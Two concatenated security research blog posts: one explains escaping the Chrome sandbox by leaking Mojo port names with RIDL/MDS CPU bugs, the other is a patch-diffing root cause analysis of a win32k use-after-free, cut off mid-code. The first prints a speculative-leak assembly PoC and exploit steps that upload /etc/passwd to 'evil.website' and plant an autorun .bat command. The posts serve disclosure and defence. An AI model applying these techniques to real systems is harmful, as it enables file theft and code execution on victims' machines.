
Escaping the Chrome Sandbox with RIDL

15 February 2020 at 17:02
Guest blog post by Stephen Röttger

tl;dr: Vulnerabilities that leak cross-process memory can be exploited to escape the Chrome sandbox. An attacker is still required to compromise the renderer before mounting this attack. To protect against attacks on affected CPUs, make sure your microcode is up to date and disable hyper-threading (HT).

In my last guest blog post, “Trashing the Flow of Data”, I described how to exploit a bug in Chrome’s JavaScript engine V8 to gain code execution in the renderer. For such an exploit to be useful, you will usually need to chain it with a second vulnerability, since Chrome’s sandbox limits your access to the OS and site isolation moves cross-site renderers into separate processes to prevent you from bypassing restrictions of the web platform.

In this post, we will take a look at the sandbox and in particular at the impact of RIDL and similar hardware vulnerabilities when used from a compromised renderer. Chrome’s IPC mechanism Mojo is based on secrets for message routing and leaking these secrets allows us to send messages to privileged interfaces and perform actions that the renderer shouldn’t be allowed to do. We will use this to read arbitrary local files as well as execute a .bat file outside of the sandbox on Windows. At the time of writing, both Apple and Microsoft are actively working on a fix to prevent this attack in collaboration with the Chrome security team.

Background

Here’s a simplified overview of what the Chrome process model looks like:
The renderer processes are in separate sandboxes and their access to the kernel is limited, e.g. via a seccomp filter on Linux or win32k lockdown on Windows. But for the renderer to do anything useful, it needs to talk to other processes to perform various actions. For example, to load an image it will need to ask the network service to fetch it on its behalf.

The default mechanism for inter-process communication in Chrome is called Mojo. Under the hood it supports message/data pipes and shared memory, but you would usually use one of the higher-level language bindings in C++, Java or JavaScript. That is, you define an interface with methods in a custom interface definition language (IDL), Mojo generates stubs for you in your language of choice and you just implement the functionality. To see what this looks like in practice, you can check out the URLLoaderFactory in .mojom IDL, its C++ implementation and its usage in the renderer.

One notable feature is that Mojo allows you to forward IPC endpoints over an existing channel. This is used extensively in the Chrome codebase, i.e. whenever you see a pending_receiver or pending_remote parameter in a .mojom file.

Under the hood, Mojo uses a platform-specific message pipe between processes, or more specifically between nodes in Mojo. Two nodes can be connected directly with each other, but they don’t have to be, since Mojo supports message routing. One node in the network is called the broker node; it has some additional responsibilities, such as setting up node channels and performing some actions restricted by the sandbox.

The IPC endpoints themselves are called ports. In the URLLoaderFactory example above, both the client and the implementation side are identified by a port. In code, a port looks like this:

class Port : public base::RefCountedThreadSafe<Port> {
 public:
  // [...]
  // The current State of the Port.
  State state;
  // The Node and Port address to which events should be routed FROM this Port.
  // Note that this is NOT necessarily the address of the Port currently sending
  // events TO this Port.
  NodeName peer_node_name;
  PortName peer_port_name;
  // The next available sequence number to use for outgoing user message events
  // originating from this port.
  uint64_t next_sequence_num_to_send;
  // [...]
};
The peer_node_name and peer_port_name above are both 128-bit random integers used for addressing. If you send a message to a port, it will first be forwarded to the right node, and the receiving node will look up the port name in a map of local ports and put the message into the right message queue.
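
To make the capability model concrete, here is a schematic sketch (my own illustration, not Mojo’s actual code) of what delivery on a receiving node boils down to: a lookup keyed purely on the random 128-bit name, with no further authorization step.

// Schematic sketch of port-name-based routing: knowing the random name is the
// capability. Unknown names are silently dropped; known names get the message.
#include <cstdint>
#include <string>
#include <unordered_map>

struct PortName {
  uint64_t hi = 0, lo = 0;  // 128 bits of randomness
  bool operator==(const PortName& o) const { return hi == o.hi && lo == o.lo; }
};

struct PortNameHash {
  std::size_t operator()(const PortName& n) const {
    return std::hash<uint64_t>{}(n.hi) ^ (std::hash<uint64_t>{}(n.lo) << 1);
  }
};

struct Port { /* state, peer_node_name, peer_port_name, message queue, ... */ };

std::unordered_map<PortName, Port, PortNameHash> local_ports;

void OnMessage(const PortName& target, const std::string& message) {
  auto it = local_ports.find(target);
  if (it == local_ports.end())
    return;  // no such local port: drop the message
  // ... otherwise enqueue the message on it->second ...
}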

Of course this means that if you have an info leak vulnerability in the browser process, you can leak port names and use them to inject messages into privileged IPC channels. And in fact, this is called out in the security section of the Mojo core documentation:
“[...] any Node can send any Message to any Port of any other Node so long as it has knowledge of the Port and Node names. [...] It is therefore important not to leak Port names into Nodes that shouldn't be granted the corresponding Capability.”
A good example of a bug that could easily be exploited to leak port names was crbug.com/779314 by @NedWilliamson. It was an integer overflow in the blob implementation which allowed you to read an arbitrary amount of heap memory in front of a blob in the browser process. The exploit would then look roughly as follows:
  1. Compromise the renderer.
  2. Use the blob bug to leak heap memory.
  3. Search through the memory for ports (a valid state + 16 high entropy bytes).
  4. Use the leaked ports to inject a message into a privileged IPC connection.
Next, we’ll look at two things: how to replace steps 2 and 3 above with a CPU bug, and what kind of primitives we can gain via privileged IPC connections.

RIDL

To exploit this behavior with a hardware vulnerability I was looking for a bug that allows you to leak memory across process boundaries. RIDL from the MDS attacks seems like the perfect candidate since it promises exactly this: it allows you to leak data from various internal buffers on affected CPUs. For details on how it works, check out the paper or the slides since they explain it much better than I could.

There were microcode and OS updates released to address the MDS attacks. However, if you read Intel’s deep dive on the topic, you will note that the mitigations clear the affected buffers when switching to a less privileged execution context. If your CPU supports hyper-threading, you will still be able to leak data from the second thread running on your physical core. The recommendation to address this is to either disable hyper-threading or implement a group scheduler.

You can find multiple PoCs for the MDS vulnerabilities online, some of them public since May 2019. The PoCs for the variants come with different properties:

  • They target either loads or stores.
  • Some require the secret to be flushed from the L1 cache.
  • You can either control the index in the 64-byte cache line to leak from or leak a 64-bit value from a previous access.
  • The speed varies a lot depending on both the variant and the exploit. The highest rate I’ve seen reported is for Brandon Falk’s MLPDS exploit at 228kB/s. For comparison, a naive exploit on my machine only reaches 25kB/s.

The one property all variants share is that they are probabilistic in what gets leaked. While the RIDL paper describes some synchronization primitives to target certain values, you usually need to trigger a repeated access to the secret in order to leak it fully.

I ended up writing two exploits for Chrome using different MDS variants, one targeting a Linux build on a Xeon Gold 6154 and one for Windows on a Core i7-7600U. I will describe both since they ended up posing different challenges when applying them in practice.

Microarchitectural Fill Buffer Data Sampling (MFBDS)

My first exploit was using MFBDS which targets the line fill buffer of the CPU. The PoC is very simple:
xbegin out            ; start TSX to catch segfault
mov   rax, [0]        ; read from page 0 => leaks a value from line fill buffer
; the rest will only execute speculatively
and   rax, 0xff       ; mask out one byte
shl   rax, 0xc        ; use as page index
add   rax, 0x13370000 ; add address of probe array
prefetchnta [rax]     ; access into probe array
xend
out: nop
After this, you will time the access to the probe array to see which index got cached.
You can change the 0 at the beginning to control the offset in the cache line for your leak. In addition, you will want to implement a prefix or suffix filter on the leaked value, as described in the paper. Note that this only leaks values that are not in the L1 cache, so you need a way to evict the secret from the cache in between accesses.
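
To make the recovery step concrete, here is a minimal, hedged sketch of the timing side, assuming the probe array from the PoC above (256 pages mapped at 0x13370000, one page per possible byte value); the threshold constant is illustrative and needs tuning per machine:

// Time each probe page and report which byte value the speculative access cached.
#include <cstdint>
#include <x86intrin.h>

constexpr uintptr_t kProbeBase = 0x13370000;  // probe array from the PoC above
constexpr uintptr_t kPageSize = 0x1000;
constexpr uint64_t kCacheHitThreshold = 120;  // cycles; tune per machine

// Returns the byte value whose probe page appears cached, or -1 for this round.
int RecoverLeakedByte() {
  for (int value = 0; value < 256; ++value) {  // a real exploit would randomize
    volatile uint8_t* probe =                  // the order to defeat prefetching
        reinterpret_cast<volatile uint8_t*>(kProbeBase + value * kPageSize);
    unsigned int aux;
    _mm_mfence();                              // serialize before timing
    uint64_t start = __rdtscp(&aux);
    (void)*probe;                              // timed load from the probe page
    uint64_t elapsed = __rdtscp(&aux) - start;
    _mm_clflush(const_cast<uint8_t*>(probe));  // reset the page for the next round
    if (elapsed < kCacheHitThreshold)
      return value;
  }
  return -1;
}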

For my first leak target, I picked a privileged URLLoaderFactory. As mentioned above, the URLLoaderFactory is used by the renderer to fetch network resources. It will enforce the same-origin policy (actually same-site) for your renderer to make sure you can’t break restrictions of the web platform. However, the browser process is also using URLLoaderFactories for different purposes and those have additional privileges. Besides ignoring the same-origin policy, they are also allowed to upload local files. Thus, if we can leak one of their port names we can use it to upload /etc/passwd to https://evil.website.

The next step will be to trigger a repeated access to the port name of a privileged loader. Getting the browser process to make network requests could be an option but seems to have too much overhead. I decided to target the port lookup in the node instead.
class COMPONENT_EXPORT(MOJO_CORE_PORTS) Node {
  // [...]
  std::unordered_map<LocalPortName, scoped_refptr<Port>> ports_;
  // [...]
};
Every node has a hash map that stores all local ports. If we send a message to a non-existent port, the target node will look it up in the map, see that it doesn’t exist and drop the message. If our port name lands in the same hash bucket as an existing port name, the lookup will read the stored hash of that port to compare it with ours. This also loads the port name itself into the cache, since it’s usually stored in the same cache line as the hash. MFBDS allows us to leak the whole cache line, even if a value didn’t get accessed directly.

The map starts with roughly 700 buckets on a fresh Chrome instance and grows mainly with the number of renderers. This makes the attack infeasible, since we would have to brute force both the bucket index and the cache line offset (1 in 4 thanks to alignment). However, I noticed a code path that allows you to create a large number of privileged URLLoaderFactories using service workers. If you create a service worker with navigation preload enabled, every top-level navigation will create such a loader. By simply creating a number of iframes and stalling their requests on the server side, you can keep a few thousand loaders alive at the same time and make the brute force much easier.
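
To put rough numbers on that (my own back-of-the-envelope estimate, not a figure from the original work): with roughly 700 buckets and 4 possible cache-line offsets, a single privileged port gives a random spoofed name only about a 1 in 2,800 chance of both landing in the right bucket and being sampled at the right offset. With a few thousand stalled navigation-preload loaders alive at once, a large fraction of buckets contain at least one privileged port, so bucket collisions become cheap and mostly the 1-in-4 cache-line offset is left to brute force.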

The only thing missing is to evict the target value from the L1 cache. Simply padding our messages with 32KB of data seems to do the trick in practice, since I assume the data gets loaded into the L1 cache in the victim and evicts everything else.
To summarize the full exploit:

  1. Compromise the renderer.
  2. Run the RIDL exploit in $NUM_CPU-1 processes with varying cache line offsets.
  3. Install a service worker with navigation preload.
  4. Create lots of iframes and stall their requests.
  5. Send messages to the network process with random port names.
  6. If we collide on the bucket index, the process in 2. can leak the port name.
  7. Spoof a message to the URLLoaderFactory to upload local files to https://evil.website.

TSX Asynchronous Abort (TAA)

In November 2019, new variants of the MDS attacks were released, and as the TAA PoC seemed to be faster than my MFBDS exploit, I decided to adapt it for the Chrome exploit. In addition, VUSec released an exploit that targets store operations, which should allow us to get rid of the cache flushing requirement if we can get the secret to be written to different addresses in memory. This should happen if we can trigger the browser to send a message to a privileged port. In this scenario, the secret port name will also be prefixed by the node name, and we can use the techniques from the RIDL paper to filter on it easily.

I also started looking for a better primitive and found that if I can talk to the NetworkService, it will allow me to create a new NetworkContext and thereby choose the file path of the sqlite3 database in which cookies are stored.

To find out how to trigger messages from the browser process to the NetworkService, I looked at the IPC methods in the interface to find one that I might be able to influence from a renderer. NetworkService.OnPeerToPeerConnectionsCountChange caught my eye, and in fact this method gets called every time a WebRTC connection gets updated. You just have to create a fake WebRTC connection, and every time you mark it as connected/disconnected it will trigger a new message to the NetworkService.

Once we leak the port name from a compromised renderer, we gain the primitive to write a sqlite3 database with a fully controlled path.

While this didn’t sound very useful at first, you can actually abuse it to gain code execution. I noticed that Windows batch files are a very forgiving file format: if there is garbage at the beginning of the file, the interpreter will skip over it until the next “\r\n” and execute the next command from there. In my exploit, I use this to create a cookies.bat file in the user’s autorun directory and add a cookie containing “\r\n” followed by a command; the command will get executed on the next login.

In the end, the exploit worked in 1-2 minutes on average and consistently finished in under 5 minutes on my machine. And I’m sure this can be vastly improved, since I’ve seen lots of speed-ups from small changes and different techniques. For example, MLPDS seems to be even faster in practice than the variant I am using.

Exploit summary:

  1. Compromise the renderer.
  2. Run the RIDL exploit in $NUM_CPU-1 processes with varying cache line offsets.
  3. Create a fake WebRTC connection and alternate between connected and disconnected.
  4. Leak the NetworkService port name.
  5. Create a new NetworkContext with a cookie file at c:\path\to\user\autorun\cookies.bat
  6. Insert the cookie “\r\ncalc.exe\r\n”.
  7. Wait for the next login.

Summary

When I started working on this, I was surprised that it’s still exploitable even though the vulnerabilities have been public for a while. If you read guidance on the topic, it will usually talk about how these vulnerabilities have been mitigated if your OS is up to date, with a note that you should disable hyper-threading to protect yourself fully. The focus on mitigations certainly gave me a false sense that the vulnerabilities had been addressed, and I think these articles could be clearer about the impact of leaving hyper-threading enabled.

That being said, I would like you to take away two things from this post. First, info leak bugs can be more than just an ASLR bypass. Even if it wasn’t for the reliance on secret port names, there would be other interesting data to leak, e.g. Chrome’s UnguessableTokens, Gmail cookies or sensitive data in other processes on the machine. If you have an idea how to find info leaks at scale, Chrome might be a good target.

Second, I ignored hardware vulnerabilities for the longest time since they are way out of my comfort zone. However, I hope this blog post gives you another data point on their impact to help you decide whether you should disable hyper-threading. There’s lots of room for exploration on what other software can be broken in similar ways, and I would love to see more examples of applying hardware bugs to break software security boundaries.

TFW you-get-really-excited-you-patch-diffed-a-0day-used-in-the-wild-but-then-find-out-it-is-the-wrong-vuln

2 April 2020 at 16:32
Posted by Maddie Stone, Project Zero

INTRODUCTION

I’m really interested in 0-days exploited in the wild and what we, the security community, can learn about them to make 0-day hard. I explained some of Project Zero’s ideas and goals around in-the-wild 0-days in a November blog post.

On December’s Patch Tuesday, I was immediately intrigued by CVE-2019-1458, a Win32k Escalation of Privilege (EoP), said to be exploited in the wild and discovered by Anton Ivanov and Alexey Kulaev of Kaspersky Lab. Later that day, Kaspersky published a blog post on the exploit. The blog post included details about the exploit, but only included partial details on the vulnerability. My end goal was to do variant analysis on the vulnerability, but without full and accurate details about the vulnerability, I needed to do a root cause analysis first. I tried to get my hands on the exploit sample, but I wasn't able to source a copy.

Without the exploit, I had to use binary patch diffing in order to complete root cause analysis. Patch diffing is an often overlooked part of the perpetual vulnerability disclosure debate, as vulnerabilities become public knowledge as soon as a software update is released, not when they are announced in release notes. Skilled researchers can quickly determine the vulnerability that was fixed by comparing changes in the codebase between old and new versions. If the vulnerability is not publicly disclosed before or at the same time that the patch is released, then this could mean that the researchers who undertake the patch diffing effort could have more information than the defenders deploying the patches.

While my patch diffing adventure did not end with me analyzing the bug I intended (more on that to come!), I do think my experience can provide the community with a data point. It’s rarely possible to reference hard timelines for how quickly sophisticated individuals can do this type of patch-diffing work, so we can use this as a test. I acknowledge that I have significant experience in reverse engineering; however, I had no previous experience at all doing research on a Windows platform and no knowledge of how the operating system worked. It took me three work weeks from setting up my first VM to having a working crash proof-of-concept for a vulnerability. This can be used as a data point (likely a high upper bound) for the amount of time it takes for individuals to understand a vulnerability via patch diffing and to create a working proof-of-concept crasher, since most individuals will have prior experience with Windows.

But as I alluded to above, it turns out I analyzed and wrote a crash POC not for CVE-2019-1458, but for CVE-2019-1433. I wrote this whole blog post back in January, went through internal reviews, then sent the blog post to Microsoft to preview (we provide vendors with 24 hour previews of blog posts). That’s when I learned I’d analyzed CVE-2019-1433, not CVE-2019-1458. At the beginning of March, Piotr Florczyk published a detailed root cause analysis and POC for the “real” CVE-2019-1458 bug. With the “real” root cause analysis for CVE-2019-1458 now available, I decided that maybe this blog post could still be helpful to share what my process was to analyze Windows for the first time and where I went wrong.

This blog post will share my attempt to complete a root cause analysis of CVE-2019-1458 through binary patch diffing, from the perspective of someone doing research on Windows for the first time. It covers the process I used, a technical description of the “wrong” but still quite interesting bug I analyzed, and some thoughts on what I learned through this work, such as where I went wrong. It includes the root cause analysis for CVE-2019-1433, which I originally thought was the vulnerability used in the in-the-wild exploit. As far as I know, the vulnerability detailed in this blog post was not exploited in the wild.

MY PROCESS

When the vulnerability was disclosed on December’s Patch Tuesday, I was immediately interested in the vulnerability. As a part of my new role on Project Zero where I’m leading efforts to study 0-days used in the wild, I was really interested in learning Windows. I had never done research on a Windows platform and didn’t know anything about Windows programming or the kernel. This vulnerability seemed like a great opportunity to start since:
  1. Complete details about the specific vulnerability weren't available,
  2. It affected both Windows 7 and Windows 10, and
  3. The vulnerability is in win32k which is a core component of the Windows kernel.

I spent a few days trying to get a copy of the exploit, but wasn’t able to. Therefore I decided that binary patch-diffing would be my best option for figuring out the vulnerability. I was very intrigued by this vulnerability because it affected Windows 10 in addition to Windows 7. However, James Forshaw advised me to patch diff the Windows 7 win32k.sys files rather than the Windows 10 versions. He suggested this for a few reasons:
  1. The signal to noise ratio is going to be much higher for Windows 7 rather than Windows 10. This “noise” includes things like Control Flow Guard, more inline instrumentation calls, and “weirder” compiler settings. 
  2. On Windows 10, win32k is broken up into a few different files: win32k.sys, win32kfull.sys, win32kbase.sys, rather than a single monolithic file.
  3. Kaspersky’s blog post stated that not all Windows 10 builds were affected.

I got to work creating a Windows 7 testing environment. I created a Windows 7 SP1 x64 VM and then started the long process of patching it up until September 2019 (the last available update prior to the December 2019 update where the vulnerability was supposedly fixed). This took about a day and a half as I worked to find the right order to apply the different updates.

It turns out that my assumption that September 2019 was the last available update prior to December 2019 was one of the biggest reasons I patch-diffed the wrong bug. I thought that September 2019 was the latest because it was the only update shown to me, besides December 2019, when I clicked “Check for Updates” within the VM. Because I was new to Windows, I didn’t realize that not all updates may be listed in the Windows Update window or that updates could also be downloaded from the Microsoft Update Catalog. When Microsoft told me that I had analyzed the wrong vulnerability, that’s when I realized my mistake. CVE-2019-1433, the vulnerability I analyzed, was patched in November 2019, not December 2019. If I had patch-diffed November to December, rather than September to December, I wouldn’t have gotten mixed up.

Once the Windows 7 VM had been updated to Sept 2019, I made a copy of its C:\Windows\System32\win32k.sys file and snapshotted the VM. I then updated it to the most recent patch, December 2019, where the vulnerability in question was fixed. I then snapshotted the VM again and saved off the copy of win32k.sys. These two copies of win32k.sys are the two files I diffed in my patch diffing analysis.

Win32k is a core kernel driver that is responsible for the windows that are shown as a part of the GUI. In later versions of Windows, it’s broken up into multiple files rather than the single file that it is on Windows 7. Having only previously worked on the Linux/Android and RTOS kernels, the GUI aspects took a little bit of time to wrap my head around.

On James Forshaw’s recommendation, I cloned my VM so that one VM would run WinDbg and debug the other VM. This allows for kernel debugging.

Now that I had copies of the supposedly patched and supposedly vulnerable versions of win32k.sys, it was time to start patch diffing.

PATCH DIFFING WINDOWS 7 WIN32K.SYS

I decided to use BinDiff to patch diff the two versions of win32k. In October 2019, I did a comparison on the different binary diffing tools available [video, slides], and for me, BinDiff worked best “out of the box” so I decided to at least start with that again.

I loaded both files into IDA and then ran BinDiff between the two versions of win32k. To my pleasant surprise, there were only 23 functions in the whole file/driver that had changed from one version to the other. In addition, there were only two new functions added in the December 2019 file that didn’t exist in September. This felt like a good sign: with only 23 changed functions, even in the worst case I could look at all of them to try to find the patched vulnerability. (Between the November and December 2019 updates only 5 functions had changed, which suggests the diffing process could have been even faster.)


Original BinDiff Matched Functions of win32k.sys without Symbols

When I started the diff, I didn’t realize that the Microsoft Symbol Server was a thing that existed. I learned about the Symbol Server and was told that I could easily get the symbols for a file by running the following command in WinDbg: x win32k!*. I still hadn’t realized that IDA Pro can automatically fetch the symbols for you from a PDB file, even if you aren’t running IDA on a Windows computer. So after running the WinDbg command, I copied all of the output to a file, rebased my IDA Pro databases to the same base address and then manually renamed functions as I reversed, based on the symbols and addresses in the text file. About a week into this escapade, I learned how to modify the IDA configuration file to have my IDA Pro instance, running on Linux, connect to my Windows VM to get the symbols.


BinDiff Matched Function of win32k.sys with Symbols

What stood out at first when I looked at BinDiff was that none of the functions called out in Kaspersky’s blog post had been changed: not DrawSwitchWndHilite, CreateBitmap, SetBitmapBits, nor NtUserMessageCall. Since I didn’t have a strong indicator for a starting point, I instead tried to rule out functions that likely weren’t the change I was looking for. I first searched for function names to determine if they were a part of a different blog post or CVE. Then I looked through all of the CVEs claimed to affect Windows 7 that were fixed in the December bulletin and matched them up. Through this I was able to rule out a number of the changed functions.

EXPLORING THE WRONG CHANGES

At this point I started scanning through functions to try and understand their purpose and look at the changes that were made. GreGetStringBitmapW caught my eye because it had “bitmap” in the name and Kaspersky’s blog post talked about the use of bitmaps.

The changes to GreGetStringBitmapW didn’t raise any flags: one of the changes had no functional impact and the other was passing arguments to another function, a function that was also listed as having changed in this update. This function had no public symbols available and is labeled as vuln_sub_FFFFF9600028F200 in the BinDiff image above. In the Dec 2019 win32k.sys, its offset from the base address is 0x22F200.


As shown by the BinDiff flow graph above, there is a new block of code added in the Dec 2019 version of win32k.sys. The Dec 2019 version added argument checking before using that argument to calculate where to write to a buffer. This made me think this was the vulnerability in contention: it’s called from a function with “bitmap” in the name and it appeared there could be a way to overrun a buffer.

I decided to keep reversing and spent a few days on this change. I was getting deep down in the rabbit hole though and had to remember that the only tie I had between this function and the details known about the in-the-wild exploit was that “bitmap” was in the name. I needed to determine if this function was even called during the calls mentioned in the Kaspersky blog post. I followed cross-references to determine how this function could be called.



The Nt prefix on function names means that the function is a syscall. The Gdi in NtGdiGetStringBitmapW means that the user-mode call is in gdi32.dll. Mateusz Jurczyk provides a table of Windows syscalls here. Therefore, the only way to trigger this function is through a syscall to NtGdiGetStringBitmapW. In gdi32.dll, the only call to NtGdiGetStringBitmapW is in GetStringBitmapA, which is exported.

Tracing this call path and realizing that none of the functions mentioned in the Kaspersky blog post called this function made me realize that it was pretty unlikely that this was the vulnerability. However, I decided to dynamically double check that this function wouldn’t be called when calling the functions listed in the blog post or trigger the task switch window.

I downloaded Visual Studio into my Windows 7 VM and wrote my first Windows Desktop app, following this guide. Once I had a working “Hello, World”, I began to add calls to the functions that are mentioned in the Kaspersky blog post: Creating the “Switch” window, CreateBitmap, SetBitmapBits, NtUserMessageCall, and half-manually/half-programmatically trigger the task-switch window, etc. I set a kernel breakpoint in Windbg on the function of interest and then ran all of these. The function was never triggered, confirming that it was very unlikely this was the vulnerability of interest.

I then moved on to GreAnimatePalette. When you trigger the task switch window, it draws a new window onto the screen and moves the “highlight” to the different windows each time you press tab. I thought that, “Sure, that could involve animating a palette”, but I learned from last time and started with trying to trigger the call in WinDbg instead. I found that it was never called in the methods that I was looking at so I didn’t spend too long and moved on.

NARROWING IT DOWN TO xxxNextWindow and xxxKeyEvent

After these couple of false starts, I decided to change my process. Instead of starting with the functions in the diff, I decided to start at the function named in Kaspersky’s blog: DrawSwitchWndHilite. I searched the cross-references graph to DrawSwitchWndHilite for any functions listed in the diff as having been changed.

As shown in the call graph above, xxxNextWindow is two calls above DrawSwitchWndHilite. When I looked at xxxNextWindow, I saw that xxxNextWindow is only called by xxxKeyEvent and that all of the changes in xxxKeyEvent surrounded the call to xxxNextWindow. These appeared to be the only functions in the diff that led to a call to DrawSwitchWndHilite, so I started reversing to understand the changes.

REVERSING THE VULNERABILITY

I had gotten symbols for the function names in my IDA databases, but for the vast majority of functions, this didn’t include type information. To begin finding type information, I started googling for different function names or variable names. While it didn’t have everything, ReactOS was one of the best resources for finding type information, and most of the structures were already in IDA.

For example, when looking at xxxKeyEvent, I saw that in one case, the first argument to xxxNextWindow is gpqForeground. When I googled for gpqForeground, ReactOS showed me that this variable has type tagQ *. Through this, I also realized that Windows uses a convention for naming variables where the type is abbreviated at the beginning of the name. For example: gpqForeground → global, pointer to queue (tagQ *), gptiCurrent → global, pointer to thread info (tagTHREADINFO *).

This was important for the modification to xxxNextWindow. There was a single line change between September and December to xxxNextWindow. The change checked a single bit in the structure pointed to by arg1. If that bit is set, the function will exit in the December version. If it’s not set, then the function proceeds, using arg1. Once I knew that the type of the first argument was tagQ *, I used WinDbg and/or IDA to see its structure. The command in WinDbg is dt win32k!tagQ.

At this point, I was pretty sure I had found the vulnerability (😉), but I needed to prove it. This involved about a week more of reversing, reading, debugging, wanting to throw my computer out the window, and getting intrigued by potential vulnerabilities that were not this vulnerability. As a side note, for the reversing I found that the Hex-Rays decompiler was great for general triage and understanding large blocks of code, but for the detailed understanding necessary (at least for me) for writing a proof-of-concept (POC), I mainly used the disassembly view.

RESOURCES

Here are some of the resources that were critical for me:
  • “Kernel Attacks Through User-Mode Callbacks” Blackhat USA 2011 talk by Tarjei Mandt [slides, video]
    • I learned about thread locking, assignment locking, and user-mode callbacks.
  • “One Bit To Rule A System: Analyzing CVE-2016-7255 Exploit In The Wild” by Jack Tang, Trend Micro Security Intelligence [blog]
    • This was an analysis of a vulnerability also related to xxxNextWindow. This blog helped me ultimately figure out how to trigger xxxNextWindow and some argument types of other functions.
  • “Kernel exploitation – r0 to r3 transitions via KeUserModeCallback” by Mateusz Jurczyk [blog]
    • This blog helped me figure out how to modify the dispatch table pointer with my own function so that I could execute during the user-mode callback.
  • “Windows Kernel Reference Count Vulnerabilities - Case Study” by Mateusz Jurczyk, Zero Nights 2012 [slides]
  • “Analyzing local privilege escalations in win32k” by mxatone, Uninformed v10 (10/2008) [article]
  • P0 Team Members: James Forshaw, Tavis Ormandy, Mateusz Jurczyk, and Ben Hawkes

TIMELINE

  • Oct 31 2019: Chrome releases fix for CVE-2019-13720
  • Dec 10 2019: Microsoft Security Bulletin lists CVE-2019-1458 as exploited in the wild and fixed in the December updates. 
  • Dec 10-16 2019: I ask around for a copy of the exploit. No luck!
  • Dec 16 2019: I begin setting up a Windows 7 kernel debugging environment. (And 2 days work on a different project.)
  • Dec 23 2019: VM is set-up. Start patch diffing
  • Dec 24-Jan 2: Holiday
  • Jan 2 - Jan 3: Look at other diffs that weren’t the vulnerability. Try to trigger DrawSwitchWndHilite
  • Jan 6: Realize the changes to xxxKeyEvent and xxxNextWindow are the correct change. (Note, dear reader, this is not in fact the “correct change”.)
  • Jan 6-Jan16: Figure out how the vulnerability works, go down random rabbit holes, work on POC.
  • Jan 16: Crash POC crashes!

Approximately 3 work weeks to set up a test environment, diff patches, and create crash POC. 

CVE-2019-1433 ROOT CAUSE ANALYSIS (not CVE-2019-1458)

Bug class: use-after-free

OVERVIEW

The vulnerability is a use-after-free of a tagQ object in xxxNextWindow, freed during a user-mode callback. (The xxx prefix on xxxNextWindow means that there is a callback to user mode.) The function xxxKeyEvent is the only caller of xxxNextWindow, and it calls xxxNextWindow with a pointer to a tagQ object as the first argument. Neither xxxKeyEvent nor xxxNextWindow locks the object to prevent it from being freed during any of the user-mode callbacks in xxxNextWindow. After one of these user-mode callbacks (xxxMoveSwitchWndHilite), xxxNextWindow uses the pointer to the tagQ object without any verification, causing a use-after-free.

DETAILED WALK THROUGH

This section will walk through the vulnerability on Windows 7. I analyzed the Windows 7 patches instead of Windows 10 as explained above in the process section. The Windows 7 crash POC that I developed is available here.

ANALYZED SAMPLES

I did the diff and analysis between the September and December 2019 updates of win32k.sys as explained in the “My Process” section.

Vulnerable win32k.sys (Sept 2019): 9dafa6efd8c2cfd09b22b5ba2f620fe87e491a698df51dbb18c1343eaac73bcf (SHA-256)
Patched win32k.sys (December 2019): b22186945a89967b3c9f1000ac16a472a2f902b84154f4c5028a208c9ef6e102 (SHA-256)

OVERVIEW

This walk through is broken up into the following sections to describe the vulnerability:
  • Triggering xxxNextWindow
  • Freeing the tagQ (queue) structure
    • User-mode callback xxxMoveSwitchWndHilite
  •  Using the freed queue

TRIGGERING xxxNextWindow

The code path is triggered by a special set of keyboard inputs to open a “Sticky Task Switcher” window. As a side note, I didn’t find a way to manually trigger the code path, only programmatically (not that an individual writing an EoP would need it to be triggered manually). To trigger xxxNextWindow, my proof-of-concept (POC) sends the following keystrokes using the SendInput API:
<ALT (Extended)> + TAB + TAB release + ALT + CTRL + TAB + release all except ALT extended + TAB. (See triggerNextWindow function in POC). 
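
As a rough illustration of the mechanism only (not the exact sequence above, which the triggerNextWindow function in the POC implements), sending an extended ALT press followed by a TAB press/release via SendInput could look like this:

// Hedged sketch: building INPUT records for SendInput. The real POC sends the
// longer sequence listed above; this only shows the mechanics.
#include <windows.h>

void SendAltTab() {
  INPUT inputs[4] = {};
  inputs[0].type = INPUT_KEYBOARD;
  inputs[0].ki.wVk = VK_MENU;                  // ALT down (extended)
  inputs[0].ki.dwFlags = KEYEVENTF_EXTENDEDKEY;
  inputs[1].type = INPUT_KEYBOARD;
  inputs[1].ki.wVk = VK_TAB;                   // TAB down
  inputs[2].type = INPUT_KEYBOARD;
  inputs[2].ki.wVk = VK_TAB;
  inputs[2].ki.dwFlags = KEYEVENTF_KEYUP;      // TAB up
  inputs[3].type = INPUT_KEYBOARD;
  inputs[3].ki.wVk = VK_MENU;
  inputs[3].ki.dwFlags = KEYEVENTF_EXTENDEDKEY | KEYEVENTF_KEYUP;  // ALT up
  SendInput(4, inputs, sizeof(INPUT));
}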

The “normal” way to trigger the task switch window is with ALT+TAB, or ALT+CTRL+TAB for “sticky”. However, that window won’t hit the vulnerable code path, xxxNextWindow. The task switching window displayed when the vulnerable code path is executed looks different from the “normal” one: the first image below shows the “normal” task switch window displayed when ALT+TAB [+CTRL] is pressed and xxxNextWindow is NOT triggered, and the second shows the window displayed when xxxNextWindow is called.

"Normal" task switch window

Window that is displayed when xxxNextWindow is called

If this is the first “tab press”, then the task switch window needs to be drawn on the screen. This code path through xxxNextWindow is not the vulnerable one. The vulnerable code in xxxNextWindow can be reached the next time you hit TAB, after the window has already been drawn on the screen and the highlight rectangle should move to the next window.

FREEING THE QUEUE in xxxNextWindow

xxxNextWindow takes a pointer to a queue (tagQ struct) as its first argument. This tagQ structure is the object that we will use after it is freed. We will free the queue in a user-mode callback from the function. 

At LABEL_106 below (xxxNextWindow+0x847), the queue is used without verifying whether or not it still exists. The only way to reach LABEL_106 in xxxNextWindow is from the branch at xxxNextWindow+0x842. This means that our only option for a user-mode callback is in the function xxxMoveSwitchWndHilite. xxxMoveSwitchWndHilite is responsible for moving the little box within the task switch window that highlights the next window.

void __fastcall xxxNextWindow(tagQ *queue, int a2) {
[...]

v43 = 0;
while ( 1 ) {
    if (gspwndAltTab->fnid & 0x3FFF == 0x2A0 && 
          gspwndAltTab->cbwndExtra + 0x128 == gpsi->mpFnid_serverCBWndProc[6] && 
          gspwndAltTab->bDestroyed == 0 )
        v45 = *(switchWndStruct **)(gspwndAltTab + 0x128);
    else
        v45 = 0i64;
    if ( !v45 ) {
        ThreadUnlock1();
        goto LABEL_106;
    }
    handleOfNextWindowToHilite = xxxMoveSwitchWndHilite(v8, v45, isShiftPressed2); USER MODE CALLBACK
    if ( v43 )
    {
        if ( v43 == handleOfNextWindowToHilite ) {
            v48 = 0i64;
LABEL_103:
            ThreadUnlock1();
